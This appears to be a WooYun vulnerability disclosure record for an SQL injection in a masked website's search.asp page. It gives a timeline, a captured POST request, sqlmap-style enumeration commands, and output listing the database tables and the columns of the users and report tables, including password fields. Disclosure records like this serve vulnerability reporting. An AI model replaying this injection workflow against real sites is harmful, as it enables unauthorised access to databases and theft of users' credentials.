WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
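2015-12-27: Details reported to the vendor; awaiting vendor handling
2015-12-31: Vendor confirmed; details disclosed to the vendor only
2016-01-10: Details disclosed to core white hats and experts in related fields
2016-01-20: Details disclosed to regular white hats
2016-01-30: Details disclosed to intern white hats
2016-02-12: Details disclosed to the public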
RT
POST /search.asp HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/search.asp
Cookie: ASPSESSIONIDCQCBARSQ=BBHLBPPDIBMEJIKBNCBFAPOE
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 93

stype=%E4%BD%93%E6%A3%80%E6%9C%BA%E6%9E%84&keywords=%25&%E6%8F%90%E4%BA%A4=%E6%90%9C%E7%B4%A2

-r f:\i.txt

web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: MySQL 5.0.11

-r f:\i.txt --common-tables

Current database
[12 tables]
+----------------+
| Apply          |
| Province       |
| Service        |
| admin          |
| city           |
| links          |
| news           |
| package        |
| report         |
| sysconstraints |
| sysusers       |
| users          |
+----------------+

-r f:\i.txt --columns -T "users"

Database: All
Table: users
[11 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| city     | non-numeric |
| email    | non-numeric |
| id       | non-numeric |
| mobile   | non-numeric |
| password | non-numeric |
| qq       | non-numeric |
| question | non-numeric |
| title    | non-numeric |
| uname    | non-numeric |
| user     | non-numeric |
| username | non-numeric |
+----------+-------------+

-r f:\i.txt --columns -T "report"

Database: All
Table: report
[8 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| city     | non-numeric |
| id       | non-numeric |
| mima     | non-numeric |
| password | non-numeric |
| title    | non-numeric |
| uname    | non-numeric |
| user     | non-numeric |
| username | non-numeric |
+----------+-------------+
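Fix
Severity: Medium
Vulnerability Rank: 8
Confirmation time: 2015-12-31 14:58
CNVD did not directly reproduce the situation described and has not yet established a direct handling channel with the organization that manages the website; pending claim.
None yet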